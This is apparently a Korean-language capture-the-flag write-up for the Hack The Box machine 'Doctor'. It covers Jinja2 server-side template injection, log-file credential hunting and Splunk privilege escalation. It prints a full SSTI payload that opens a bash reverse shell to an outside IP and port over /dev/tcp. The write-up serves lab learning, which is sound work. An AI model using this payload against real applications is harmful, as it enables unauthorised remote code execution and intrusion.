Port Scan

Service Enum

웹 서비스 검색 중 doctors.htb 도메인 발견하여 /etc/hosts에 등록 후 접속 시 새로운 웹페이지 접속 가능

SSTI 공격 시도 후 메인페이지 소스코드에서 발견한 디렉토리에 접근하여 소스코드 확인 시 SSTI 공격이 가능한것을 확인

SSTI의 명령어를 통해 해당 플랫폼이 Jinja2 인것을 확인
https://useegod.com/2021/12/09/ssti/

//Basic injection
{{7*'7'}} 의 결과가 7777777 이라면 Jinja2

리버스쉘 명령어를 입력하여 리버스쉘 획득

{{config.__class__.__init__.__globals__['os'].popen("bash -c 'bash -i >& /dev/tcp/10.10.14.14/9001 0>&1'").read()}}

id권한 확인시 adm 권한이 있다는 것을 확인하여 로그 파일 검색
/var/log/apache2/ 위치에서 backup 폴더 발견<

backup 파일 검색 결과 수상한 URL을 발견

cat backup | awk '{print $7}' | sort

home 디렉토리 검색결과 shaun 계정을 발견하여 초반에 발견한 8089포트에서 로그인 시도 시 로그인 가능

해당 페이지에서 Splunk 를 확인하여 해당 플랫폼의 취약점 확인

Git에서 획득한 Py 코드로 명령어 실행 시 root 쉘 획득 가능